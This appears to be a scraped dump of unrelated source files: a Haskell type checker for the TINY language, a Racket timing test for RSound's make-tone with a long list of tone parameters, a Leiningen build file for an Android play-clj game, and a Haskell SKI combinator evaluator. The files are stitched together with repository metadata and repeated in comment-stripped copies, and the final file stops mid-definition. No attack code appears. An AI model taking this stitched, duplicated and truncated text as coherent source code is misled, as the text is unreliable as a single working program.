typeCheckStmts stmts
typeCheckStmt (AssignK _ exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "assignment of non-integer value"
typeCheckStmt (WriteK exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "write of non-integer value"
typeCheckStmt (ReadK _) = do
return ()
typeCheckExp :: Exp -> Either String ExpType
typeCheckExp (ConstK _) = return IntegerT
typeCheckExp (IdK _) = return IntegerT
typeCheckExp (OpK token exp1 exp2) = do
type1 <- typeCheckExp exp1
assert (type1 == IntegerT) "Op applied to non-integer"
type2 <- typeCheckExp exp2
assert (type2 == IntegerT) "Op applied to non-integer"
case token of
Lt -> return BooleanT
Equal -> return BooleanT
Plus -> return IntegerT
Minus -> return IntegerT
Times -> return IntegerT
Over -> return IntegerT
assert :: Bool -> String -> Either String ()
assert True _ = return ()
assert False msg = Left msg
| null | https://raw.githubusercontent.com/kahaani/TINY-in-Haskell/9149c71faa09d33a18b00a08180cefeb6359de77/v2/TypeCheck.hs | haskell | module TypeCheck (
typeCheck
) where
import Control.Monad.Error
import Scan (Token(..))
import Parse (Stmt(..), Exp(..))
data ExpType = VoidT | IntegerT | BooleanT deriving (Eq)
typeCheck :: [Stmt] -> [Stmt]
typeCheck stmts = case typeCheckStmts stmts of
Right () -> stmts
Left err -> error $ "Type Error: " ++ err
typeCheckStmts :: [Stmt] -> Either String ()
typeCheckStmts = mapM_ typeCheckStmt
typeCheckStmt :: Stmt -> Either String ()
typeCheckStmt (If2K exp stmts) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (If3K exp stmts1 stmts2) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts1
typeCheckStmts stmts2
typeCheckStmt (RepeatK stmts exp) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "repeat test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (AssignK _ exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "assignment of non-integer value"
typeCheckStmt (WriteK exp) = do
type1 <- typeCheckExp exp
assert (type1 == IntegerT) "write of non-integer value"
typeCheckStmt (ReadK _) = do
return ()
typeCheckExp :: Exp -> Either String ExpType
typeCheckExp (ConstK _) = return IntegerT
typeCheckExp (IdK _) = return IntegerT
typeCheckExp (OpK token exp1 exp2) = do
type1 <- typeCheckExp exp1
assert (type1 == IntegerT) "Op applied to non-integer"
type2 <- typeCheckExp exp2
assert (type2 == IntegerT) "Op applied to non-integer"
case token of
Lt -> return BooleanT
Equal -> return BooleanT
Plus -> return IntegerT
Minus -> return IntegerT
Times -> return IntegerT
Over -> return IntegerT
assert :: Bool -> String -> Either String ()
assert True _ = return ()
assert False msg = Left msg
| |
e88f1cc6b8a6f8135fee9cb29057a5b110f8f319008014bbb8af42b2d9d27b97 | jbclements/RSound | test-make-tone.rkt | #lang racket
(module+ test
(require "../main.rkt"
"../integral-cycles.rkt"
rackunit
rackunit/text-ui)
(run-tests
(test-suite
"make-tone"
(let ()
;; tests of integral-cycles:
(check-equal? (cycles-to-use 441 44100.0) 1)
(check-equal? (cycles-to-use 440 44100.0) 22)
(check-equal? (cycles-to-use (* 440 (expt 2 1/12)) 44100.0) 103)
;; this is a performance test, to see whether
;; caching and caching of cycles is working correctly.
(define-values (dc t1 t2 t3)
(time-apply
(lambda ()
(map
(lambda (p) (apply make-tone p))
'((130.8127826502993 91/1270 220040)
(130.8127826502993 91/1270 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(146.8323839587038 89/1270 330290)
(146.8323839587038 89/1270 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(174.61411571650194 44/635 110020)
(174.61411571650194 44/635 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(195.99771799087463 48/635 111168)
(195.99771799087463 48/635 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(207.65234878997256 99/1270 109790)
(207.65234878997256 99/1270 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(220 91/1270 220040)
(220 91/1270 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(293.6647679174076 89/1270 330290)
(293.6647679174076 89/1270 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(349.2282314330039 44/635 110020)
(349.2282314330039 44/635 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(391.99543598174927 48/635 111168)
(391.99543598174927 48/635 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(415.3046975799451 99/1270 109790)
(415.3046975799451 99/1270 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(440 91/1270 220040)
(440 91/1270 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(523.2511306011972 99/1270 109790)
(523.2511306011972 99/1270 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790))))
(list)))
(check < t1 1000)))))
| null | https://raw.githubusercontent.com/jbclements/RSound/c699db1ffae4cf0185c46bdc059d7879d40614ce/rsound/test/test-make-tone.rkt | racket | tests of integral-cycles:
this is a performance test, to see whether
caching and caching of cycles is working correctly. | #lang racket
(module+ test
(require "../main.rkt"
"../integral-cycles.rkt"
rackunit
rackunit/text-ui)
(run-tests
(test-suite
"make-tone"
(let ()
(check-equal? (cycles-to-use 441 44100.0) 1)
(check-equal? (cycles-to-use 440 44100.0) 22)
(check-equal? (cycles-to-use (* 440 (expt 2 1/12)) 44100.0) 103)
(define-values (dc t1 t2 t3)
(time-apply
(lambda ()
(map
(lambda (p) (apply make-tone p))
'((130.8127826502993 91/1270 220040)
(130.8127826502993 91/1270 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(146.8323839587038 89/1270 330290)
(146.8323839587038 89/1270 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(174.61411571650194 44/635 110020)
(174.61411571650194 44/635 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(195.99771799087463 48/635 111168)
(195.99771799087463 48/635 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(207.65234878997256 99/1270 109790)
(207.65234878997256 99/1270 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(220 91/1270 220040)
(220 91/1270 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(293.6647679174076 89/1270 330290)
(293.6647679174076 89/1270 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(349.2282314330039 44/635 110020)
(349.2282314330039 44/635 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(391.99543598174927 48/635 111168)
(391.99543598174927 48/635 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(415.3046975799451 99/1270 109790)
(415.3046975799451 99/1270 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(440 91/1270 220040)
(440 91/1270 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(523.2511306011972 99/1270 109790)
(523.2511306011972 99/1270 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790))))
(list)))
(check < t1 1000)))))
|
bd8c11fdced73cda4a1bdc807ef683b3671e67ea78ac1648a815e4547e9701d1 | oakes/play-clj-examples | project.clj | (defproject super-koalio "0.0.1-SNAPSHOT"
:description "FIXME: write description"
:dependencies [[com.badlogicgames.gdx/gdx "1.9.3" :use-resources true]
[com.badlogicgames.gdx/gdx-backend-android "1.9.3"]
[com.badlogicgames.gdx/gdx-box2d "1.9.3"]
[com.badlogicgames.gdx/gdx-bullet "1.9.3"]
[neko/neko "3.2.0"]
[org.clojure-android/clojure "1.7.0-r4" :use-resources true]
[play-clj "1.1.1"]]
:profiles {:dev {:dependencies [[org.clojure-android/tools.nrepl "0.2.6-lollipop"]]
:android {:aot :all-with-unused}}
:release {:android
{;; Specify the path to your private
;; keystore and the the alias of the
;; key you want to sign APKs with.
;; :keystore-path "/home/user/.android/private.keystore"
;; :key-alias "mykeyalias"
:aot :all}}}
:android {;; Specify the path to the Android SDK directory either
;; here or in your ~/.lein/profiles.clj file.
;; :sdk-path "/home/user/path/to/android-sdk/"
;; Uncomment this if dexer fails with OutOfMemoryException
;; :force-dex-optimize true
:assets-paths ["../desktop/resources"]
:native-libraries-paths ["libs"]
:target-version "15"
:aot-exclude-ns ["clojure.parallel" "clojure.core.reducers"
"cljs-tooling.complete" "cljs-tooling.info"
"cljs-tooling.util.analysis" "cljs-tooling.util.misc"
"cider.nrepl" "cider-nrepl.plugin"]
:dex-opts ["-JXmx4096M"]}
:source-paths ["src/clojure" "../desktop/src-common"]
:java-source-paths ["src/java"]
:javac-options ["-target" "1.6" "-source" "1.6" "-Xlint:-options"])
| null | https://raw.githubusercontent.com/oakes/play-clj-examples/449a505a068faeeb35d4ee4622c6a05e3fff6763/super-koalio/android/project.clj | clojure | Specify the path to your private
keystore and the the alias of the
key you want to sign APKs with.
:keystore-path "/home/user/.android/private.keystore"
:key-alias "mykeyalias"
Specify the path to the Android SDK directory either
here or in your ~/.lein/profiles.clj file.
:sdk-path "/home/user/path/to/android-sdk/"
Uncomment this if dexer fails with OutOfMemoryException
:force-dex-optimize true | (defproject super-koalio "0.0.1-SNAPSHOT"
:description "FIXME: write description"
:dependencies [[com.badlogicgames.gdx/gdx "1.9.3" :use-resources true]
[com.badlogicgames.gdx/gdx-backend-android "1.9.3"]
[com.badlogicgames.gdx/gdx-box2d "1.9.3"]
[com.badlogicgames.gdx/gdx-bullet "1.9.3"]
[neko/neko "3.2.0"]
[org.clojure-android/clojure "1.7.0-r4" :use-resources true]
[play-clj "1.1.1"]]
:profiles {:dev {:dependencies [[org.clojure-android/tools.nrepl "0.2.6-lollipop"]]
:android {:aot :all-with-unused}}
:release {:android
:aot :all}}}
:assets-paths ["../desktop/resources"]
:native-libraries-paths ["libs"]
:target-version "15"
:aot-exclude-ns ["clojure.parallel" "clojure.core.reducers"
"cljs-tooling.complete" "cljs-tooling.info"
"cljs-tooling.util.analysis" "cljs-tooling.util.misc"
"cider.nrepl" "cider-nrepl.plugin"]
:dex-opts ["-JXmx4096M"]}
:source-paths ["src/clojure" "../desktop/src-common"]
:java-source-paths ["src/java"]
:javac-options ["-target" "1.6" "-source" "1.6" "-Xlint:-options"])
|
07b3be5de04087fc69accc6989936252070a42dff3e5fc31c7868cbd53a8b924 | ekmett/coda | Meta2.hs | module Meta2 where
data Neutral = S0 | S1 !Term | S2 !Term !Term | K0 | K1 !Term | I0 deriving Show
data Term = N Neutral | A Neutral !Term !Term
instance Show Term where
showsPrec d (N l) = showsPrec d l
showsPrec d (A _ l r) = showParen (d > 10) $ showString "A " . showsPrec 11 l . showChar ' ' . showsPrec 11 r
infixl 9 `call`
call :: Neutral -> Term -> Neutral
call S0 (N K0) = K1 (N I0) -- SK=KI
call S0 x = S1 x
call (S1 x) y = S2 x y
call (S2 x y) z = eval x `call` z `call` app y z
call K0 x = K1 x
call (K1 x) _ = eval x
call I0 x = eval x
eval :: Term -> Neutral
eval (N t) = t
eval (A t _ _) = t
-- application with opportunistic optimization
app :: Term -> Term -> Term
app (N S0) (N K0) = N (K1 (N I0)) -- SK=KI
app (N S0) x = N (S1 x)
app (N (S1 x)) y = N (S2 x y)
app (N K0) x = N (K1 x)
app (N I0) x = x
app l r = A (eval l `call` r) l r
_S0, _K0, _I0 :: Term
_S0 = N S0
_K0 = N K0
_I0 = N I0
| null | https://raw.githubusercontent.com/ekmett/coda/bca7e36ab00036f92d94eb86298712ab1dbf9b8d/ref/ski/Meta2.hs | haskell | SK=KI
application with opportunistic optimization
SK=KI | module Meta2 where
data Neutral = S0 | S1 !Term | S2 !Term !Term | K0 | K1 !Term | I0 deriving Show
data Term = N Neutral | A Neutral !Term !Term
instance Show Term where
showsPrec d (N l) = showsPrec d l
showsPrec d (A _ l r) = showParen (d > 10) $ showString "A " . showsPrec 11 l . showChar ' ' . showsPrec 11 r
infixl 9 `call`
call :: Neutral -> Term -> Neutral
call S0 x = S1 x
